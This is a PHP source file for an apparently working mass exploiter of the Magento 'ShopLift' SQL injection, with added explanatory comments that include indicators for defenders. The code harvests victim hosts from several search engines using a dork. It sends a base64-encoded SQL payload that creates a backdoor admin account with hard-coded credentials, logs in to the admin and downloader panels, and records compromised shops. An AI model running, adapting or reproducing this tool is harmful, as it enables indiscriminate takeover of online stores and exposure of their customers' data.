  1. <?php
  2. /* ++++++++++++++++++++++++++++++++++
  3. ShopLift Exploiter Beta Version
  4. Author : FathurFreakz
  5. Use : php thisfile.php "Dork"
  6. YOGYAKARTA BLACK HAT
  7. Special Thanks to
  8. Nabiila Rizqi Khasanah
  9. +++++++++++++++++++++++++++++++++
  10. */
// Suppress every PHP diagnostic (cURL warnings, undefined-offset notices in
// GetStr(), the count()-on-string warning in CurlPost(), ...). This hides
// warnings/notices only; an uncaught exception or TypeError still aborts.
error_reporting(0);
// Remove the execution time limit: the search loops in SearchEngine() issue
// hundreds of HTTP requests per engine, then one exploit attempt per host.
set_time_limit(0);
/**
 * Mass scanner / exploiter for the Magento "ShopLift" admin SQL injection
 * (POST to /admin/Cms_Wysiwyg/directive/index/ with a base64 `filter`
 * parameter that carries raw SQL).
 *
 * Flow: SearchEngine() harvests candidate hosts for a search dork from Bing,
 * Google, Ask and Walla, then ExecuteExploit() fires the injection at every
 * host, tries to log in with the injected credentials, and appends a summary
 * line to a dated log file.
 *
 * Defender / IR notes (all values are visible in this class):
 *   - injected admin account: username `mdn_newbie`, password `Anjing__`,
 *     firstname 'Firstname', lastname 'Lastname', email
 *     `<15 hex chars>@telekpitekwashere.cok`, `is_active` = 1, `rp_token` NULL;
 *   - matching `admin_role` row: parent_id 1, tree_level 2, role_type 'U',
 *     role_name 'Firstname';
 *   - request User-Agent `Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)`;
 *   - local artifacts of the tool: cookie jar `pitek.txt` and a log file
 *     `ShopLift-<dd-mm-YYYY>.log` in the working directory.
 */
class ShopLiftFathurFreakz {
    // Search dork used by SearchEngine(); set via Dork().
    private $dork = "";
    // Credentials of the admin account the SQL injection creates; the same
    // values are used afterwards by LoginDownloader() and LoginAdmin().
    private $username = "mdn_newbie";
    private $password = "Anjing__";

    /**
     * Stores the search dork and returns it unchanged.
     *
     * @param string $dork  Search-engine query used to find targets.
     * @return string       The stored dork.
     */
    public function Dork($dork){
        $this->dork = $dork;
        return $this->dork;
    }

    /**
     * Fetches $url with a fresh cURL handle and returns the response body
     * (or false on transport failure, as curl_exec() does).
     *
     * @param string      $url   Absolute URL to request.
     * @param array|false $post  Key/value pairs to send as a POST body; false = GET.
     * @return string|false      Response body, redirects already followed.
     *
     * Security-relevant behaviour:
     *   - TLS certificate and hostname verification are disabled, so HTTPS
     *     targets are contacted with no server authentication at all;
     *   - redirects are followed, so a 30x can send the credentials/POST body
     *     to a different host;
     *   - POST values are concatenated without url-encoding, and the result of
     *     rtrim() is discarded, so the body keeps a trailing '&'.
     */
    private function CurlPost($url, $post = false){
        $ch = curl_init();
        // No TLS peer/host verification.
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        // Fixed, very old IE user agent - usable as a network indicator.
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        if($post !== false){
            // Build "k=v&k=v&" by hand; neither key nor value is url-encoded.
            $isi = '';
            foreach($post as $key=>$value){
                $isi .= $key.'='.$value.'&';
            }
            // Return value is thrown away: the trailing '&' stays in the body.
            rtrim($isi, '&');
            // Redundant - the URL was already set above.
            curl_setopt($ch, CURLOPT_URL, $url);
            // count() on a string: pre-PHP 8 this warns (suppressed) and yields
            // 1, i.e. "POST on"; on PHP 8 count() of a non-Countable throws a
            // TypeError, which error_reporting(0) does not hide.
            curl_setopt($ch, CURLOPT_POST, count($isi));
            // Cookies received on this request are written to pitek.txt
            // (write-only: no CURLOPT_COOKIEFILE is set anywhere in the class).
            curl_setopt($ch, CURLOPT_COOKIEJAR, 'pitek.txt');
            curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
        }
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }

    /**
     * Returns the substring of $string between the first $start and the
     * next $end after it. No bounds check: when $start is absent, $a[1] is
     * undefined (notice suppressed) and the result is effectively empty.
     *
     * @param string $start
     * @param string $end
     * @param string $string
     * @return string
     */
    private function GetStr($start,$end,$string){
        $a = explode($start,$string);
        $b = explode($end,$a[1]);
        return $b[0];
    }

    /**
     * Tries the injected credentials against the Magento Connect Manager
     * (/downloader/) of the target host.
     *
     * @param string $url  Target URL; only scheme and host are used.
     * @return string      "Success\nPermission\t\t: Writeable|Denied" when the
     *                     response looks like a logged-in page, else "Failed".
     */
    private function LoginDownloader($url){
        $link = parse_url($url);
        $data = $this->CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
            array("username" => $this->username,
                "password" => $this->password)
        );
        // Logged-in heuristics: the page offers "Log Out" or "Return to Admin".
        if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
            // Magento's own warning about an unwritable install directory.
            $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
            return "Success\nPermission\t\t: ".$permission;
        } else {
            return "Failed";
        }
    }

    /**
     * Fetches /admin/ to scrape the form_key, then POSTs the injected
     * credentials to the admin login form.
     *
     * @param string $target  Target URL; only scheme and host are used.
     * @return string         Always "Success\nOrder Total\t\t: <value>" - the
     *                        response is never checked for an actual login, so
     *                        the logged "Success" can be a false positive. The
     *                        value is whatever sits in the first
     *                        <span class="price"> of the response (empty if
     *                        none).
     */
    private function LoginAdmin($target){
        $link = parse_url($target);
        // GET the login page to harvest the CSRF form_key.
        $get = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]));
        $key = $this->GetStr("<input name=\"form_key\" type=\"hidden\" value=\"","\" />",$get);
        $data = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]),
            array("login[username]" => $this->username,
                "login[password]" => $this->password,
                "form_key" => $key)
        );
        return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data);

    }

    /**
     * Fires the ShopLift SQL injection at the target.
     *
     * The base64-encoded `filter` parameter closes the legitimate
     * popularity[...] expression and appends raw SQL that:
     *   1. builds a Magento-style password hash MD5(salt . password) . ':' . salt
     *      with salt 'rp' for $this->password;
     *   2. copies the highest existing admin_user.extra value;
     *   3. INSERTs an active admin_user row for $this->username with a
     *      throw-away email <15 hex chars>@telekpitekwashere.cok;
     *   4. INSERTs an admin_role row (parent_id 1, role_type 'U') for that user.
     * The `___directive` parameter renders the Adminhtml/report_search_grid
     * block with getCsvFile, which is what evaluates the filter server-side.
     *
     * @param string $target  Target URL; only scheme and host are used.
     * @return bool           true when the response body decodes as an image
     *                        (treated as "injection executed"); false otherwise.
     *                        Requires the GD extension for imagecreatefromstring().
     */
    private function ShopLiftExploit($target){
        // Pseudo-random email local part derived from the current timestamp.
        $email = substr(md5(time()),2,15);
        $link = parse_url($target);
        $data = $this->CurlPost(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index/",$link["scheme"],$link["host"]),
            array("filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{$this->password}') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','{$email}@telekpitekwashere.cok','{$this->username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{$this->username}'),'Firstname');"),
                "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
                "forwarded" => "1")
        );
        // Vulnerable-or-not is decided solely by whether the body is an image.
        return (@imagecreatefromstring($data) !== false);
    }

    /**
     * Runs the full attack chain against one harvested host and records the
     * outcome.
     *
     * @param string $victim  Host (optionally with scheme and/or path) as
     *                        captured by SearchEngine().
     * @return string         Multi-line result block on success (also appended
     *                        to ShopLift-<d-m-Y>.log), or a one-line
     *                        "[HH:MM:SS] <target> => Not vuln !" otherwise.
     *
     * Note: the fclose() at the end sits after both return statements and is
     * unreachable, so the log handle opened here is never closed explicitly
     * (it is released only when PHP garbage-collects it / at script exit).
     */
    private function ExecuteExploit($victim){
        // Append-mode log file named by today's date.
        $file = fopen("ShopLift-".date("d-m-Y").".log","a");
        $url = parse_url($victim);
        // Harvested links have their "http://" stripped by the search regexes,
        // so normally no scheme is present and "http://" is prepended to the
        // whole captured string (which may still include a path); when a
        // scheme exists only scheme://host is kept.
        $target = (!isset($url["scheme"]) ? "http://".$victim : $url["scheme"]."://".$url["host"]);
        if($this->ShopLiftExploit($target)){
            $downloader = $this->LoginDownloader($target);
            $admin = $this->LoginAdmin($target);
            $result = "\n============[ShopLift Result]============\nSite\t\t\t: {$target}\nLogin Admin\t\t: {$admin}\nLogin Downloader\t: {$downloader}\n===========================================\n";
            fwrite($file,$result);
            return $result;
        } else {
            return "[".date("H:i:s")."] ".$target." => Not vuln !\n";
        }
        // Unreachable (see method comment).
        fclose($file);
    }

    /**
     * Harvests candidate hosts for $this->dork from one search engine, then
     * calls ExecuteExploit() on every unique host found.
     *
     * @param int $engine  1 = Bing (results 0..1000 step 10)
     *                     2 = Bing per market, for each code in $ccbing
     *                     3 = Google per country TLD, for each suffix in $ccgoogle (start 0..200)
     *                     4 = Ask per country subdomain (page 1,101,...,901)
     *                     5 = Walla (pages 1..100)
     *                     any other value matches no case, so nothing is
     *                     harvested and nothing is attacked.
     * @return void        Progress ("Catch [n]" per page, a total per engine,
     *                     then each ExecuteExploit() result) is echoed.
     *
     * Each case strips "http://" from the captured links, drops links that
     * point back at the search engine itself, and de-duplicates. Only the
     * Google regex stops at the first '/' (host only); the others capture up to
     * the closing quote and may include a path.
     */
    public function SearchEngine($engine){
        $list = array();
        $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
        $ccgoogle = array("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
        switch($engine){
            case 1:
                // Bing, global: 101 result pages.
                for($i=0;$i<=1000;$i+=10){
                    $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&first=".$i);
                    preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
                    foreach($m[1] as $link){
                        // Skip Microsoft-owned result links.
                        if(!preg_match("/live|msn|bing|microsoft/",$link)){
                            if(!in_array($link,$list)){
                                $list[] = $link;
                            }
                        }
                    }
                    // Raw unique matches on this page, before the filters above.
                    echo "Catch [".count(array_unique($m[1]))."]\n";
                }
                echo "Total Bing : ".count($list)."\n";
                break;
            case 2:
                // Bing, one pass per market code in $ccbing.
                for($x=0;$x<=count($ccbing)-1;$x++){
                    for($i=0;$i<=1000;$i+=10){
                        $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($this->dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE");
                        preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
                        foreach($m[1] as $link){
                            if(!preg_match("/live|msn|bing|microsoft/",$link)){
                                if(!in_array($link,$list)){
                                    $list[] = $link;
                                }
                            }
                        }
                        echo "Catch [".count(array_unique($m[1]))."]\n";
                    }
                }
                echo "Total Bing World : ".count($list)."\n";
                break;
            case 3:
                // Google, one pass per country TLD in $ccgoogle; captures host only.
                for($x=0;$x<=count($ccgoogle)-1;$x++){
                    for($i=0;$i<=200;$i+=10){
                        $search = $this->CurlPost("http://www.google.".$ccgoogle[$x]."/search?num=50&q=".urlencode($this->dork)."&start=".$i."&sa=N");
                        preg_match_all('/<a href=\"?http:\/\/([^>\"]*)\//m', $search, $m);
                        foreach($m[1] as $link){
                            if(!preg_match("/google/",$link)){
                                if(!in_array($link,$list)){
                                    $list[] = $link;
                                }
                            }
                        }
                        echo "Catch [".count(array_unique($m[1]))."]\n";
                    }
                }
                echo "Total Google World : ".count($list)."\n";
                break;
            case 4:
                // Ask, one pass per country subdomain (reuses $ccbing codes).
                for($x=0;$x<=count($ccbing)-1;$x++){
                    for($i=1;$i<=1000;$i+=100){
                        $search = $this->CurlPost("http://".$ccbing[$x].".ask.com/web?q=".urlencode($this->dork)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
                        preg_match_all('/href=\"http:\/\/(.*?)\" onmousedown=/m', $search, $m);
                        foreach($m[1] as $link){
                            if(!preg_match("/ask\.com/",$link)){
                                if(!in_array($link,$list)){
                                    $list[] = $link;
                                }
                            }
                        }
                        echo "Catch [".count(array_unique($m[1]))."]\n";
                    }
                }
                echo "Total Ask World : ".count($list)."\n";
                break;
            case 5:
                // Walla (Israeli portal search), pages 1..100.
                for($i=1;$i<=100;$i+=1){
                    $search = $this->CurlPost("http://search.walla.co.il/?q=".urlencode($this->dork)."&type=text&page=".$i);
                    preg_match_all('/<a href=\"http:\/\/(.+?)\" title=/m', $search, $m);
                    foreach($m[1] as $link){
                        if(!preg_match("/walla\.co\.il/",$link)){
                            if(!in_array($link,$list)){
                                $list[] = $link;
                            }
                        }
                    }
                    echo "Catch [".count(array_unique($m[1]))."]\n";
                }
                echo "Total Walla : ".count($list)."\n";
                break;
        }
        // Attack phase: every harvested entry gets one exploit attempt.
        if(count($list)>0){
            echo "Exploiting target ".count($list).". Please wait ... \n";
            foreach($list as $do){
                echo $this->ExecuteExploit($do);
            }
        }
    }

    /**
     * Prints the usage banner (shown when no dork is given on the command line).
     *
     * @return void
     */
    public function ExploitLogo(){
        $logo = "==================================================\n";
        $logo .= "#\t Magento ShopLift Auto Exploiter \t #\n";
        $logo .= "#------------------------------------------------#\n";
        $logo .= "#\t Author \t: FathurFreakz \t\t #\n";
        $logo .= "#\t Email \t\t: fathurfreakz@gmail.com #\n";
        $logo .= "#\t Thanks to \t: Nabiila Rizqi K \t #\n";
        // Script name is taken from the running file so the usage line is accurate.
        $logo .= "#\t Usage \t\t: php ".basename($_SERVER["SCRIPT_FILENAME"], '.php').".php \"Dork\"\t #\n";
        $logo .= "#------------------------------------------------#\n";
        $logo .= "#\t (C) ".date("Y")." YOGYAKARTA BLACK HAT \t\t #\n";
        $logo .= "==================================================\n";
        echo $logo;
    }
}
  217. $Exploiter = new ShopLiftFathurFreakz();
  218. if(isset($argv[1]) && !empty($argv[1])){
  219. echo "Scanning target for dork : {$argv[1]}\n";
  220. $Exploiter->Dork($argv[1]);
  221. for($i=0;$i<6;$i++){
  222. $Exploiter->SearchEngine($i);
  223. flush();
  224. sleep(1);
  225. }
  226. echo "Scan finished !!!\n";
  227. flush();
  228. sleep(1);
  229. echo "Shuting down engine !!!\n";
  230. } else {
  231. $Exploiter->ExploitLogo();
  232. }